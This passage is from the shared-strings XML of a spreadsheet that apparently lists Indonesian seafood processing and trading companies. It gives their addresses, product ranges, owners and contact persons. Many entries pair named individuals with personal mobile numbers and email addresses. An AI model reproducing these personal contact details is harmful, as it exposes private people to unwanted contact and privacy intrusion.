    <t>Jl. Raya Salembaran, Pergudangan Royal Kosambi Blok D6 (Room 1), Kel. Cengklong, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Bandeng Beku, Daging Tuna Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>HANSON SAPUTRA</t>
  </si>
  <si>
    <t>marinalautansf@yahoo.com</t>
  </si>
  <si>
    <t>021-54373279</t>
  </si>
  <si>
    <t>HAFIZH &amp; 08221342811</t>
  </si>
  <si>
    <t>AHMAD HAFIZH FATHONI</t>
  </si>
  <si>
    <t>PT. BLUE STAR ANUGRAH</t>
  </si>
  <si>
    <t>Jl. DI Panjaitan No. 01 RT 001 RW 001, Kel. Saradan, Kec. Pemalang, Kabupaten Pemalang</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi Kaleng</t>
  </si>
  <si>
    <t>Zul Kamirullah</t>
  </si>
  <si>
    <t>Pemalang</t>
  </si>
  <si>
    <t>Saradan</t>
  </si>
  <si>
    <t>noviandriani77.na@gmail.com</t>
  </si>
  <si>
    <t>Rachmadia Yoga (081246117299)</t>
  </si>
  <si>
    <t>Arie Prabawa</t>
  </si>
  <si>
    <t>PT. BINTANG KARYA LAUT</t>
  </si>
  <si>
    <t>Jl. Raya Rembang - Tuban Km 28, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang</t>
  </si>
  <si>
    <t>Surimi Beku, Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>PT. KELOLA MINA LAUT</t>
  </si>
  <si>
    <t>Sluke</t>
  </si>
  <si>
    <t>Sendangmulyo</t>
  </si>
  <si>
    <t>bkl@bklseafood.com</t>
  </si>
  <si>
    <t>Wahyu Tri Murti - 085695957900</t>
  </si>
  <si>
    <t>ZAINUL WASIK</t>
  </si>
  <si>
    <t>PT. NATUNA FISH BUILDING</t>
  </si>
  <si>
    <t>Pergudangan Kartika Blok B No. 2 Batu Ampar Batam, Kel. Taman Baloi, Kec. Batam Kota, Kota Batam</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Udang Segar</t>
  </si>
  <si>
    <t>Awang</t>
  </si>
  <si>
    <t>Batam Kota</t>
  </si>
  <si>
    <t>Taman Baloi</t>
  </si>
  <si>
    <t>pt.natuna1135@yahoo.com</t>
  </si>
  <si>
    <t>Awang , Hp 08127008382</t>
  </si>
  <si>
    <t>CV. LANDAK LAUT SEAFOOD</t>
  </si>
  <si>
    <t>Jl. Bakaran Batu 16AA, Kel. Sei Rengas Permata, Kec. Medan Area, Kota Medan</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Kulit Hiu Kering, Sirip Pari Kering, Kulit Pari Kering, Perut Ikan Kering</t>
  </si>
  <si>
    <t>Putera</t>
  </si>
  <si>
    <t>Medan Area</t>
  </si>
  <si>
    <t>Sei Rengas Permata</t>
  </si>
  <si>
    <t>landaklautseafood@yahoo.com</t>
  </si>
  <si>
    <t>Putera &amp; 08192000088</t>
  </si>
  <si>
    <t>Willy</t>
  </si>
  <si>
    <t>UD. MENARA MAS</t>
  </si>
  <si>
    <t>Jl. Sukamara No.48 RT 01 RW 02 , Kel. Landasan Ulin Utara, Kec. Liang Anggang, Kota Banjar Baru</t>
  </si>
  <si>
    <t>Labi-Labi Hidup, Kura-kura Hidup</t>
  </si>
  <si>
    <t>Sukadi Hadi</t>
  </si>
  <si>
    <t>Liang Anggang</t>
  </si>
  <si>
    <t>Landasan Ulin Utara</t>
  </si>
  <si>
    <t>widdyarti6@gmail.com</t>
  </si>
  <si>
    <t>PT. KELOLA MINA LAUT UNIT I</t>
  </si>
  <si>
    <t>Jl. KIG Raya Selatan Kav C-5 &amp; C-13 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Fillet Ikan Beku, Ikan Pelagis Beku, Tuna Beku, Ikan Hasil Budidaya Beku, Ikan Demersal Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>kuncoro@kmlseafood.com</t>
  </si>
  <si>
    <t>PT. KELOLA MINA LAUT UNIT II</t>
  </si>
  <si>
    <t>Jl. KIG Raya Selatan Kav C6 &amp; C14 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Lumatan Daging, Beku</t>
  </si>
  <si>
    <t>Seafood Bernilai Tambah Beku, Udang Rebus Beku, Udang Mentah Beku, Daging Rajungan Beku</t>
  </si>
  <si>
    <t>windra@kmlseafood.com</t>
  </si>
  <si>
    <t>PT. PURIBOGA DWI ARTHA</t>
  </si>
  <si>
    <t>JL Prof. DR. Latumenten No.109 H, Kel. Angke, Kec. Tambora, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Rumput Laut Kombu Kering, Wakame Kering, Nori</t>
  </si>
  <si>
    <t xml:space="preserve">Hadisusanto Halim </t>
  </si>
  <si>
    <t>Tambora</t>
  </si>
  <si>
    <t>Angke</t>
  </si>
  <si>
    <t>import@puriboga.com</t>
  </si>
  <si>
    <t>021 6312891</t>
  </si>
  <si>
    <t>Elang Mas  0856939291</t>
  </si>
  <si>
    <t>Hadisusanto Halim</t>
  </si>
  <si>
    <t>CV. KARYA MURNI</t>
  </si>
  <si>
    <t>Kampung Parang, Dusun Jonggo Batu, Kel. Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Perut Ikan Kering, Abalone Kering, Teripang Kering, Teripang Beku</t>
  </si>
  <si>
    <t>Fajrin</t>
  </si>
  <si>
    <t>karyamurni2018@yahoo.com</t>
  </si>
  <si>
    <t>Fajrin, SE &amp; 081283571354</t>
  </si>
  <si>
    <t>Fajrin, SE</t>
  </si>
  <si>
    <t>PT. MODERN MITRA SEJATI</t>
  </si>
  <si>
    <t>Jl. Rungkut Industri III No.85, Kel. Rungkut Tengah, Kec. Gunung Anyar, Kota Surabaya</t>
  </si>
  <si>
    <t>Fillet Ikan Beku, Udang Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Ikan Hasil Budidaya Beku</t>
  </si>
  <si>
    <t>Lim Chi Ang. S.E</t>
  </si>
  <si>
    <t>Gunung Anyar</t>
  </si>
  <si>
    <t>modernmitrasejati@gmail.com</t>
  </si>
  <si>
    <t>031-8411840, 031-8476659</t>
  </si>
  <si>
    <t>Sundari Setyowati 081357681161</t>
  </si>
  <si>
    <t>CV. INDOPERTAMA</t>
  </si>
  <si>
    <t>Dusun Kunti RT 001 RW 004, Kel. Mranggen, Kec. Purwoasri, Kabupaten Kediri</t>
  </si>
  <si>
    <t>BUDIYAH AL KASIHATI</t>
  </si>
  <si>
    <t>Purwoasri</t>
  </si>
  <si>
    <t>Mranggen</t>
  </si>
  <si>
    <t>indopertama.cv@gmail.com</t>
  </si>
  <si>
    <t>BUDIYAH AL KASIHATI 08123299159</t>
  </si>
  <si>
    <t>PT. AGRO BOGA UTAMA</t>
  </si>
  <si>
    <t>Jl. Kavling DPR No.181 RT 003 RW 004, Kel. Serua, Kec. Bojongsari, Kota Depok</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Salmon Beku, Trout Beku</t>
  </si>
  <si>
    <t>Achmad Fachmi</t>
  </si>
  <si>
    <t>Serua</t>
  </si>
  <si>
    <t>fathendrataufiq@gmail.com</t>
  </si>
  <si>
    <t>021-73884182</t>
  </si>
  <si>
    <t>Fathendra / 087839389543, Gunawan 08568675335</t>
  </si>
  <si>
    <t>Fathendra</t>
  </si>
  <si>
    <t>PT. KEUMKANG INDUSTRI INDONESIA</t>
  </si>
  <si>
    <t>Jl. Kima 15 Kav R4D - R4E, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Lobster Beku, Udang Kipas Beku</t>
  </si>
  <si>
    <t>PARK YONG WON</t>
  </si>
  <si>
    <t>keumkang2017@gmail.com</t>
  </si>
  <si>
    <t>0411-4741475</t>
  </si>
  <si>
    <t>Ino 082348759746</t>
  </si>
  <si>
    <t>PT. MINA JAYA WYSIA</t>
  </si>
  <si>
    <t>Pergudangan Bandara Mas Blok T 11, Kel. Kedaung Wetan, Kec. Neglasari, Kota Tangerang</t>
  </si>
  <si>
    <t>Cacing Laut Hidup, Belut Beku, Betutu Hidup, Belut Segar, Ikan Demersal Segar, Teripang Segar, Cephalopoda Segar, Teripang Kering, Ikan Pelagis Segar, Telur Ikan Terbang Kering, Ikan Air Tawar Segar, Sirip Hiu Kering, Udang Segar, Kerang Segar, Keong Segar, Cacing Laut Kering, Kulit Ikan Kering, Lobster Segar, Kepiting Segar, Rajungan Segar, Lobster Hidup, Lobster Air Tawar Hidup, Belut Hidup, Kerang Hidup, Keong Hidup, Kerapu Hidup, Udang Hidup, Udang Ronggeng Hidup, Kepiting Hidup</t>
  </si>
  <si>
    <t>Putu Sumardika</t>
  </si>
  <si>
    <t>Kedaung Wetan</t>
  </si>
  <si>
    <t>adwinsenpai@gmail.com</t>
  </si>
  <si>
    <t>021-29215888, 021-292156888, 021-292157888</t>
  </si>
  <si>
    <t>Sony Somantri 085223858687</t>
  </si>
  <si>
    <t>Sony Somantri</t>
  </si>
  <si>
    <t>CV. CTK</t>
  </si>
  <si>
    <t>Jl. Gabion No. 99 Pelabuhan Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan</t>
  </si>
  <si>
    <t>Harno</t>
  </si>
  <si>
    <t>udctk.99@gmail.com</t>
  </si>
  <si>
    <t>CV. MITRA RATU MANDIRI</t>
  </si>
  <si>
    <t>Komp. Pelabuhan Perikanan Nusantara Palabuhanratu (PPNP) RT 03 RW 19, Kel. Palabuhanratu, Kec. Sukabumi, Kabupaten Sukabumi</t>
  </si>
  <si>
    <t>Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Winata</t>
  </si>
  <si>
    <t>Sukabumi</t>
  </si>
  <si>
    <t>mitraratumandiri@gmail.com</t>
  </si>
  <si>
    <t>Aan Munandar - 08112</t>
  </si>
  <si>
    <t>Irfan Nuryadin</t>
  </si>
  <si>
    <t>PT. PASTI BANGUN JAYA</t>
  </si>
  <si>
    <t>Jl. Selar Gang Jambu No.12, Kel. Ketapang, Kec. Pangkalbalam, Kota Pangkal Pinang</t>
  </si>
  <si>
    <t>Rajungan Beku, Rajungan Segar, Ikan Demersal Beku, Udang Segar, Udang Beku, Cephalopoda Segar, Cephalopoda Beku, Udang Kipas Segar, Udang Kipas Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>HONG LIE</t>
  </si>
  <si>
    <t>Pangkalbalam</t>
  </si>
  <si>
    <t>bangunjayapkp@yahoo.com</t>
  </si>
  <si>
    <t>0717-431895</t>
  </si>
  <si>
    <t>Jl. Rungkut Industri III No.81- 83, Kel. Rungkut Tengah, Kec. Gunung Anyar, Kota Surabaya</t>
  </si>
  <si>
    <t>Fillet Ikan Beku, Udang Rebus Beku, Udang Mentah Beku, Ikan Hasil Budidaya Beku, Produk Perikanan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>PT. CENTRALPROTEINA PRIMA</t>
  </si>
  <si>
    <t>chusniah.iswahani@email.cpp.co.id</t>
  </si>
  <si>
    <t>031-8476401</t>
  </si>
  <si>
    <t>CHUSNIAH ISWAHANI 081252147851</t>
  </si>
  <si>
    <t>SAMIONO</t>
  </si>
  <si>
    <t>CV. YELIN SHAN HANG</t>
  </si>
  <si>
    <t>Jl. Mutiara Margomulyo Indah Blok K No.21, Kel. Manukan Wetan, Kec. Tandes, Kota Surabaya</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Perut Ikan Kering, Teripang Kering</t>
  </si>
  <si>
    <t>STEFANIE DWIJAYATI.R</t>
  </si>
  <si>
    <t>Tandes</t>
  </si>
  <si>
    <t>Manukan Wetan</t>
  </si>
  <si>
    <t>cv.yelin123@hotmail.com</t>
  </si>
  <si>
    <t>STEFANIE DWIJAYATI.R  081233720928</t>
  </si>
  <si>
    <t>PT. SEVEN SEAS MARINE PRODUCT</t>
  </si>
  <si>
    <t>Jl. Rungkut Industri 8 No. 8, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering, Hiu Beku, Fillet Hiu Beku, Ikan Kering, Telur Ikan Beku, Cephalopoda Beku, Fillet Ikan Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Tuna Beku, Udang Beku</t>
  </si>
  <si>
    <t>TAKUYA SATO</t>
  </si>
  <si>
    <t>omintok9@gmail.com</t>
  </si>
  <si>
    <t>031-8483235/031-8416497</t>
  </si>
  <si>
    <t>Ainnur Muammar Harist 085841151786/Ipuk Dwi Lestari 081555712106</t>
  </si>
  <si>
    <t>PT. YAKIN PASIFIK TUNA</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Samudera Lampulo, Jl. Sisingamangaraja Ujung, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh</t>
  </si>
  <si>
    <t>Tongkol Giling Beku, Cephalopoda Beku, Tuna Loin Beku, Tuna Loin Segar, Tuna Segar, Udang Beku, Ikan Demersal Segar, Salmon Beku, Trout Beku, Tuna Beku, Ikan Pelagis Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>ALMER HAFIS SANDY</t>
  </si>
  <si>
    <t>Kuta Alam</t>
  </si>
  <si>
    <t>Lampulo</t>
  </si>
  <si>
    <t>yakin.pasifik@gmail.com</t>
  </si>
  <si>
    <t>0651-8052290</t>
  </si>
  <si>
    <t>PENI RAHAYU 085277716665</t>
  </si>
  <si>
    <t>MASAYUKI TAKAKU</t>
  </si>
  <si>
    <t>PT. BAHARI PRATAMA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Pelita Cipatuguran RT 04 RW 20, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Cephalopoda Beku, Tuna Beku, Tuna Segar</t>
  </si>
  <si>
    <t>CHEN MING TSUNG</t>
  </si>
  <si>
    <t>pt.baharipratamamandiri@yahoo.com</t>
  </si>
  <si>
    <t>(0266) 435065, (0266) 431403</t>
  </si>
  <si>
    <t>Riska 082319888821 / 085624443721</t>
  </si>
  <si>
    <t>Ujay</t>
  </si>
  <si>
    <t>PT. BARAMUDA BAHARI</t>
  </si>
  <si>
    <t>Udang Beku, Ikan Demersal Beku, Salmon Beku, Fillet Ikan Beku, Kepiting Beku</t>
  </si>
  <si>
    <t>ADI SURYA D.</t>
  </si>
  <si>
    <t>qsd2@baramudabahari.com</t>
  </si>
  <si>
    <t>0343-656513</t>
  </si>
  <si>
    <t>Rifa Ernitawati</t>
  </si>
  <si>
    <t>JUNITA DWI LIA H</t>
  </si>
  <si>
    <t>CV. ANUGERAH BAHARI FISHERY</t>
  </si>
  <si>
    <t>Jl. Nambangan No.9 RT 006 RW 001, Kel. Tanah Kali Kedinding, Kec. Kenjeran, Kota Surabaya</t>
  </si>
  <si>
    <t>Udang Beku, Cephalopoda Segar, Cephalopoda Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Fillet Ikan Beku, Ikan Demersal Segar, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>SOETIKWAN</t>
  </si>
  <si>
    <t>Kenjeran</t>
  </si>
  <si>
    <t>Tanah Kali Kedinding</t>
  </si>
  <si>
    <t>abf.frozenfish@gmail.com</t>
  </si>
  <si>
    <t>031-51500092</t>
  </si>
  <si>
    <t>081938383404  /  08113092225</t>
  </si>
  <si>
    <t>PT. LONTARA JAYA SAKTI</t>
  </si>
  <si>
    <t>Jl. Pasar Ikan Beba, Kel. Tamasaju, Kec. Galesong Utara, Kabupaten Takalar</t>
  </si>
  <si>
    <t>Udang Kipas Segar, Udang Kipas Beku, Ikan Air Tawar Segar, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Bandeng Beku, Bandeng Segar, Ikan Air Tawar Beku</t>
  </si>
  <si>
    <t>CITRA WAHYUNI HASANUDDIN</t>
  </si>
  <si>
    <t>Tamasaju</t>
  </si>
  <si>
    <t>lontara.new2018@gmail.com</t>
  </si>
  <si>
    <t>CITRA WAHYUNI HASANUDDIN &amp; 082188222280</t>
  </si>
  <si>
    <t>PT. SIGER JAYA SENTOSA</t>
  </si>
  <si>
    <t>Jl. Raya Tanjung Bintang No.101, Kel. Serdang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan</t>
  </si>
  <si>
    <t>Kerang Rebus Beku, Udang Kipas Beku, Daging Rajungan Pasteurisasi Kaleng</t>
  </si>
  <si>
    <t>M.SEFTA FERDINAN</t>
  </si>
  <si>
    <t>peaceanto@yahoo.co.id</t>
  </si>
  <si>
    <t>0721 - 350411</t>
  </si>
  <si>
    <t>Shubhan 081390212489</t>
  </si>
  <si>
    <t>SHUBHAN ARYANTO</t>
  </si>
  <si>
    <t>PT. KARUNIA SAMUDERA HINDIA</t>
  </si>
  <si>
    <t>Jl. Letjen Gatot Subroto No. 99, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Scallop Beku</t>
  </si>
  <si>
    <t>TIONG BIN</t>
  </si>
  <si>
    <t>Sarudik</t>
  </si>
  <si>
    <t>Pondok Batu</t>
  </si>
  <si>
    <t>haldi.kasahi@yahoo.com</t>
  </si>
  <si>
    <t>0631-26631</t>
  </si>
  <si>
    <t>DONNA</t>
  </si>
  <si>
    <t>PT. PHILLIPS SEAFOODS INDONESIA</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami Km 7, Kel. Kota Baru, Kec. Tanjung Karang Timur, Kota Bandar Lampung</t>
  </si>
  <si>
    <t>Ikan Berlapis Tepung Beku, Campuran Seafood Pasteurisasi Dingin, Daging Rajungan Pasteurisasi Kaleng, Seafood Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Steve Phillips</t>
  </si>
  <si>
    <t>Tanjung Karang Timur</t>
  </si>
  <si>
    <t>rhidayat@phillipsfoods.com</t>
  </si>
  <si>
    <t>0721 350441</t>
  </si>
  <si>
    <t>Abdurroni 081366358986</t>
  </si>
  <si>
    <t>Dicki Ramadlon</t>
  </si>
  <si>
    <t>PT. INTIMAS SURYA</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Salmon Beku, Cephalopoda Segar, Cephalopoda Beku, Ikan Demersal Beku, Tuna Beku, Tuna Segar, Ikan Pelagis Segar, Gurita Rebus Beku, Ikan Demersal Segar</t>
  </si>
  <si>
    <t xml:space="preserve">LIM KIM TONG </t>
  </si>
  <si>
    <t>qcbalipermata@gmail.com</t>
  </si>
  <si>
    <t>0361-724246</t>
  </si>
  <si>
    <t>Rian (081285321572)</t>
  </si>
  <si>
    <t>IVAN HANS JORGIH, Rian 081285321572</t>
  </si>
  <si>
    <t>CV. MITRA KARYA</t>
  </si>
  <si>
    <t>Griya Taman Asri GE No.01, Kel. Tawangsari, Kec. Taman, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering, Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering , Teripang Kering, Tulang Ikan Kering, Perut Ikan Kering, Kulit Ikan Kering, Tulang Cumi-Cumi Kering, Cephalopoda Kering</t>
  </si>
  <si>
    <t>Budiyono</t>
  </si>
  <si>
    <t>Tawangsari</t>
  </si>
  <si>
    <t>azharperikanan@gmail.com</t>
  </si>
  <si>
    <t>PT. SUMBERLAUT BENGINDO</t>
  </si>
  <si>
    <t>Jl. Raya Sunan Gunung Jati No.15-16 RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon</t>
  </si>
  <si>
    <t>Kerang Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Udang Beku, Scallop Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>YAMIN</t>
  </si>
  <si>
    <t>Gunung Jati</t>
  </si>
  <si>
    <t>Grogol</t>
  </si>
  <si>
    <t>slb_bgd@hotmail.com</t>
  </si>
  <si>
    <t>YAMIN 081324004600</t>
  </si>
  <si>
    <t>PT. JAYABALI BERSAUDARA</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya IV No.16 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Tuna Beku</t>
  </si>
  <si>
    <t>KHO BUDIMAN</t>
  </si>
  <si>
    <t>jayabali.adm@gmail.com</t>
  </si>
  <si>
    <t>BUHERI MUSLIM &amp; 081281436431</t>
  </si>
  <si>
    <t>UD. SAMUDERA JAYA</t>
  </si>
  <si>
    <t>Jl. Terboyo Industri Barat Blok E No.4, Kel. Trimulyo, Kec. Genuk, Kota Semarang</t>
  </si>
  <si>
    <t>Beku, Lainnya, Kering</t>
  </si>
  <si>
    <t>Lobster Beku, Rumput Laut Beku, Keong Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Kerang Beku, Sirip Hiu Beku, Kepiting Beku, Udang Beku, Teripang Beku, Gelembung Ikan Kering, Teripang Kering</t>
  </si>
  <si>
    <t>AGUS SUMARTIO</t>
  </si>
  <si>
    <t>Genuk</t>
  </si>
  <si>
    <t>Trimulyo</t>
  </si>
  <si>
    <t>skpsamuderajaya@gmail.com</t>
  </si>
  <si>
    <t>0246-593093</t>
  </si>
  <si>
    <t>DESTI 08122818810</t>
  </si>
  <si>
    <t>PT. INTI MULIA CAHAYA</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Paotere Makassar, Kel. Gusung, Kec. Ujung Tanah, Kota Makassar</t>
  </si>
  <si>
    <t>Kepiting Hidup, Ikan Demersal Segar, Ikan Pelagis Segar, Tuna Segar, Udang Segar</t>
  </si>
  <si>
    <t>HERYBERTUS DEWANTO</t>
  </si>
  <si>
    <t>Ujung Tanah</t>
  </si>
  <si>
    <t>Gusung</t>
  </si>
  <si>
    <t>intimuliacahaya778@gmail.com</t>
  </si>
  <si>
    <t>MUHAMMAD ASRUL / 08114186855</t>
  </si>
  <si>
    <t>MUHAMMAD ASRUL</t>
  </si>
  <si>
    <t>MARIJO 88</t>
  </si>
  <si>
    <t>Jl. Poros Pinrang - Pare-Pare Km 6, Kel. Manarang, Kec. Mattiro Bulu, Kabupaten Pinrang</t>
  </si>
  <si>
    <t>Beku, Lainnya, Lumatan Daging</t>
  </si>
  <si>
    <t>Bandeng Tanpa Duri, Abon Duri Bandeng, Produk Perikanan Bernilai Tambah Beku, Amplang Bandeng, Tik-tik Bandeng</t>
  </si>
  <si>
    <t>Mariani Pandin, SKM.,M.Kes</t>
  </si>
  <si>
    <t>Mattiro Bulu</t>
  </si>
  <si>
    <t>Manarang</t>
  </si>
  <si>
    <t>bp3mphkp.skp@gmail.com</t>
  </si>
  <si>
    <t>Mariani Pandin, SKM.,M.Kes &amp; 081342523008</t>
  </si>
  <si>
    <t>PT. CELEBES BERKAH NIAGA</t>
  </si>
  <si>
    <t>Pergudangan Logistik Terpadu Pelitagro Blok A No.15, Jl. Ir. Sutami No.24, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>Mukhadir Halik</t>
  </si>
  <si>
    <t>Parangloe</t>
  </si>
  <si>
    <t>info@celebesbn.com</t>
  </si>
  <si>
    <t>Mukhadir Halik - 08114115125</t>
  </si>
  <si>
    <t>CV. SAMUDRA SENTOSA</t>
  </si>
  <si>
    <t>Jl. PPI, Kel. Mangunharjo, Kec. Mayangan, Kota Probolinggo</t>
  </si>
  <si>
    <t>Sirip Hiu Beku, Hiu Beku, Sirip Hiu Kering, Gelembung Ikan Kering</t>
  </si>
  <si>
    <t>EDIANTO</t>
  </si>
  <si>
    <t>Mangunharjo</t>
  </si>
  <si>
    <t>samuderasentosagemilang@gmail.com</t>
  </si>
  <si>
    <t>PT. KLANGENAN MINA ARTHA</t>
  </si>
  <si>
    <t>Dusun Ketawang RT 01 RW 01, Kel. Tasikmadu, Kec. Watulimo, Kabupaten Trenggalek</t>
  </si>
  <si>
    <t>UMAR MARDJONO</t>
  </si>
  <si>
    <t>Watulimo</t>
  </si>
  <si>
    <t>Tasikmadu</t>
  </si>
  <si>
    <t>klangenan2018.pt@gmail.com</t>
  </si>
  <si>
    <t>M. NAZAR ILMI 0818585360</t>
  </si>
  <si>
    <t>CV. PUTRA TELLO MANDIRI</t>
  </si>
  <si>
    <t>Jl. Pukat Banting II No.54, Kel. Bantan, Kec. Medan Tembung, Kota Medan</t>
  </si>
  <si>
    <t>SIU WANDI</t>
  </si>
  <si>
    <t>Medan Tembung</t>
  </si>
  <si>
    <t>Bantan</t>
  </si>
  <si>
    <t>cv_putratello.mandiri@yahoo.co.id</t>
  </si>
  <si>
    <t>SIU WANDI 08126008, Alby Anzalia 0822941799946</t>
  </si>
  <si>
    <t>PT. NUANSA CIPTA MAGELLO</t>
  </si>
  <si>
    <t>Jl. Kima III Kav 5 AB, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi Kaleng, Cephalopoda Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Ikan Demersal Segar, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>RADITYA WARDHANA</t>
  </si>
  <si>
    <t>miraprodncm@gmail.com</t>
  </si>
  <si>
    <t>0411 515855</t>
  </si>
  <si>
    <t>PALMIRA / 081354967481</t>
  </si>
  <si>
    <t>A.RIDHA ADE IRAWAN</t>
  </si>
  <si>
    <t>PT. CITA KARYA AGUNG</t>
  </si>
  <si>
    <t>Jl. Pelabuhan Perikanan Lingkungan XI Gabion, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan</t>
  </si>
  <si>
    <t>Udang Beku, Kerang Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>HENDRA EFFENDI GULTOM</t>
  </si>
  <si>
    <t>citakaryaagung2018@yahoo.com</t>
  </si>
  <si>
    <t>08126006090198, Fax 061-6943684</t>
  </si>
  <si>
    <t>Aan 081376342888, Dita 082165007473</t>
  </si>
  <si>
    <t>PT. BLUESEA SEAFOOD INDUSTRY</t>
  </si>
  <si>
    <t>Jl. Blanak No.1 Blok B1 No.19 Kawasan Pelabuhan Perikanan Pantai Tegalsari, Kel. Tegalsari, Kec. Tegal Barat, Kota Tegal</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Cephalopoda Beku, Ikan Pelagis Beku, Daging Kerang Beku, Udang Beku, Rajungan Beku, Daging Abalone Rebus Beku</t>
  </si>
  <si>
    <t>LEE GUG HYEONG</t>
  </si>
  <si>
    <t>Tegal Barat</t>
  </si>
  <si>
    <t>Tegalsari</t>
  </si>
  <si>
    <t>blue.sea.seafood7092@gmail.com</t>
  </si>
  <si>
    <t>0283-4532732</t>
  </si>
  <si>
    <t>Nurtantio Sony Putro 081391998288</t>
  </si>
  <si>
    <t>PT. BIOTA LAUT GANGGANG</t>
  </si>
  <si>
    <t>Jl. Kebangkitan No.8, Dusun Belabelawa, Kel. Polewali, Kec. Suppa, Kabupaten Pinrang</t>
  </si>
  <si>
    <t>Rumput Laut Kering, Tepung Rumput Laut, Tepung Agar-agar, Karagenan</t>
  </si>
  <si>
    <t>ZHU XIAO MING</t>
  </si>
  <si>
    <t>Suppa</t>
  </si>
  <si>
    <t>Polewali</t>
  </si>
  <si>
    <t>biotalautblg@gmail.com</t>
  </si>
  <si>
    <t>Rian 081349586168, Husna 085341079138</t>
  </si>
  <si>
    <t>ZHANG CAN HONG</t>
  </si>
  <si>
    <t>CV. NAJWA BAHARI</t>
  </si>
  <si>
    <t>Jl. Sabutung Baru 3 No.25, Kel. Camba Berua, Kec. Ujung Tanah, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Pelagis Segar, Udang Segar, Cephalopoda Segar</t>
  </si>
  <si>
    <t>SUKMAWATI S.Pd</t>
  </si>
  <si>
    <t>Camba Berua</t>
  </si>
  <si>
    <t>cvnajwabahari@gmail.com</t>
  </si>
  <si>
    <t>MUHAMMAD IRWANSYAH &amp; 085145333939</t>
  </si>
  <si>
    <t>MUHAMMAD IRWANSYAH</t>
  </si>
  <si>
    <t>PT. BANDENG OERANG SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Brigjen Katamso No.24 RT 004 RW 004, Kel. Kampung Dalem, Kec. Kota, Kota Kediri</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Lobster Beku</t>
  </si>
  <si>
    <t>WIYONO PANTORO</t>
  </si>
  <si>
    <t>kpantoro8899@gmail.com</t>
  </si>
  <si>
    <t>ANTHONY WIYONO 082141137455</t>
  </si>
  <si>
    <t>ANTHONY WIYONO</t>
  </si>
  <si>
    <t>MENTARI</t>
  </si>
  <si>
    <t>Wonsobo I RT 03 RW 01, Kel. Banjarejo, Kec. Tanjungsari, Kabupaten Gunung Kidul</t>
  </si>
  <si>
